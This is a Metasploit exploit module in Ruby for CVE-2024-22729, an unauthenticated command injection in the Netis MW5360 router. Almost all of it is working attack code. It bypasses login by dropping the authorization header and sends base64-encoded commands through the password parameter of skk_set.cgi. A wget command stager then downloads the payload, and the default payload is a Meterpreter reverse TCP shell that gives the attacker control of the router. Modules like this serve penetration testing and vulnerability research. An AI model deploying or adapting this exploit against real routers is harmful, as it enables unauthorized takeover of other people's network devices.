##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Netis router MW5360 unauthenticated RCE.',
        'Description' => %q{
          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
          The router's login page authorization can be bypassed by simply deleting the authorization header,
          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
          to take control of the router.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'Adhikara13' # Discovery of the vulnerability
        ],
        'References' => [
          ['CVE', '2024-22729'],
          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],
          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
        ],
        'DisclosureDate' => '2024-01-11',
        'Platform' => ['linux'],
        'Arch' => [ARCH_MIPSLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_MIPSLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['wget'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => false,
          'RPORT' => 80
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),
      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
    ])
  end

  def execute_command(cmd, _opts = {})
    # cleanup payload file when session is established.
    if cmd.include?('chmod +x')
      register_files_for_cleanup(cmd.split('+x')[1].strip)
    end
    # skip last command to remove payload because it does not work
    unless cmd.include?('rm -f')
      payload = Base64.strict_encode64("`#{cmd}`")
      print_status("Executing #{cmd}")
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
        'vars_post' => {
          'password' => payload,
          'quick_set' => 'ap',
          'app' => 'wan_set_shortcut'
        }
      })
    end
  end

  def check
    print_status("Checking if #{peer} can be exploited.")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
      'vars_post' => {
        'mode_name' => 'skk_get',
        'wl_link' => 0
      }
    })
    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')

    # trying to get the model and version number
    # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
    # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison
    unless version.nil?
      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop
      # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D
      if version[2].upcase.split('-V')[0].include?('-')
        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
      else
        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
      end
      # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower
      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))
        return CheckCode::Appears(version[2].chop.to_s)
      end

      return CheckCode::Safe(version[2].chop.to_s)
    end
    CheckCode::Safe
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :linux_dropper
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed
      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])
    end
  end
end
